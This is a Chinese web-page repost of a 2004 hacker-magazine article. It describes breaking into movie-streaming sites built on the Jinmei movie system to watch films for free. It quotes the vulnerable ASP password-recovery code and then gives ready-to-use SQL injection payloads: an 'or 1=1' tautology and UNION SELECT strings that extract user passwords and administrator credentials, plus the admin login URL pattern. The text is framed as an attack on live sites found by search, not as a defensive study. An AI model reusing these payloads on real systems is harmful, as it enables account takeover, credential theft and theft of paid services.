当前位置: 首页 > 图文教程 > 数据库 > MSSQL > SQL注入奇招致胜 UNION查询轻松免费看电影

MSSQL
SQL Server--全文本检索的应用(一)
SQL 2005的SSIS与Oracle的迁移性能
SQL优化实例:从运行30分钟到运行只要30秒
无法在SQL Server2005 Manger Studio 中录入中文的问题
SQL Artisan多表查询和统计
SQL Server数据库开发人员在应聘时经常被问到哪些问题
一个完整的SQL SERVER数据库全文索引的示例
SQL Server安全之加密术和SQL注入攻击
如何对SQL Server中的tempdb“减肥”
SQL Server 2005升级的十个步骤
如何在SQL Server开发中融入极限编程技术
SQL Server应用程序高级SQL注入(下)
SQL Server应用程序高级SQL注入(上)
SQL Server连接中的常见错误
IIS中SQL Server数据库的安全问题
SQL Server 2005区域配置和安全工具
保护 SQL Server 的十个步骤
如何利用SQL Server 2000的复制选项
SQL Server 数据库使用备份还原造成的孤立用户和对象名‘xxx’无效的错误的解决办法
SQL SERVER 2005同步复制技术的应用

MSSQL 中的 SQL注入奇招致胜 UNION查询轻松免费看电影


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-30   浏览: 132 ::
收藏到网摘: n/a

 

此文发表在2004年黑客X档案第4期 

周末无聊,同学想让我帮他下载一些电影看,我爽快的答应了。看了这么多期X档案,水平自然长进不少,也没事玩玩"鸡"。这次想免费下载些电影,没问题(我知道N多电影程序有漏洞)。闲话少说,切入正题。

我打开Google,随便搜索了一下电影网站,点开了一个。看了一下界面,知道和金梅电影系统关联很大。金梅系统和"洞"网(7.0安全多啦,自己想的)差不多,也是有N多漏洞,比如注入啊,COOKIE欺骗什么的。我就在X档案03年11期看过一篇文章,写的是用ASC和MID函数对系统管理员帐户进行猜测。我也想用这种方法猜测,猜了半天都没猜对,真烦人,同学还在那边等我哪,这不是很丢人。我决定找个简单的办法,还是读读源码吧!

下载了一个金梅三电影系统,看了一下,这么多个文件,头马上大了。还是在自己电脑上运行一下吧。注册了一个用户,点了一下找回密码,别人说这里有漏洞。看了一下,象是有漏洞的界面,有三个参数,还直接把密码显示出来。好,看一下源码。

39        <% if request("myuserid")="" then %>

...
 

  58   <%else

            set rs=server.createobject("adodb.recordset")

            sql="select password from users where userid='"&request("myuserid")&"'and city='"&request("ask")&"'and adress='"&request("answer")&"'"

            rs.open sql,conn,1,1

            if rs.eof and rs.bof then%>

这里果然没过滤。好多人都想到了可以用上面的方法注入了。能不能有更简单的方法呢?

我仔细考虑语句的形式如下:

select password from users where userid=‘‘ and city=‘‘ and adress='‘

如果用户名,密码提示问题(city),密码提示答案(adress)和表users一行匹配,便打印这行的password,而且是明文的。我想的过程就不写了,后来我想到了一种方法,就是利用union查询。Access功能是很弱的,不能执行命令,不能导出文本,还不能注释。有个子查询可以利用之外,也就剩下这个 union了。


怎么利用呢?先在本机做实验。测试过程简略,直接写有所收获的结果。


要是知道了一个该网站的一个用户名(比如abc),可以这样利用。

在"你注册问题"处填: abc' or  ‘1=1(如果用户名是bcd,就变为bcd' or ‘1=1)

密码提示问题处随便填几个字母或数字,最好别有符号,容易影响结果: 比如字母a

密码提示答案处随便填几个字母或数字,填个a

回车后就看到该用户的密码了,简单吧(如图一)。

其实这样一来,上面的语句就变为:
 

select password from users where userid=‘abc'  or  ‘1=1‘ and city=‘a‘ and adress='a‘

呵呵,程序无条件的执行了,因为被 or ‘1=1'跳过后面的验证了。

 
可是网站用户名也不是轻易得到的啊。别急,得到用户名一样简单。如下:


在"你注册问题"处随便处填几个字母或数字,最好别有符号,容易影响结果: 比如字母a

密码提示问题处和上面一样,随便填:我也填个a

关键是在密码提示答案:我填的是a' union select  userid  from users where oklook>=3 or '0

上面就是要找黄金用户的帐户名(如图二),看到用户名后再用前面的方法找到密码。

可以在where后面加很多参数并赋不同的值可以得到很多帐户。

按上面的填入后输入语句就变成了:

select password from users where userid=‘a‘ and city=‘a‘ and adress=' a' union select  userid  from users  where oklook>=3 or '0 ‘
 

细心的读者看到这可能已经想到怎样得到管理员的帐号和密码,不错,也很简单。我也不写过程了,直接写出语句如下:

得到帐号:
 
select password from users where userid=‘a‘ and city=‘a‘ and adress=' a' union select  name  from okwiantgo  where  id>=1 or '0 ‘

得到密码:

select password from users where userid=‘a‘ and city=‘a‘ and adress=' a' union select  pwd  from okwiantgo  where  id>=1 or '0 ‘

 
然后登陆就行了,路径格式为:

http://网站电影路径/findaccout.asp?name=管理员帐号&pwd=管理员密码

回车,很轻松就进管理界面了。(如图三)

有时findaccount.asp可能被改名了,这时只能拿个黄金帐户了。

这个漏洞有很多电影程序有,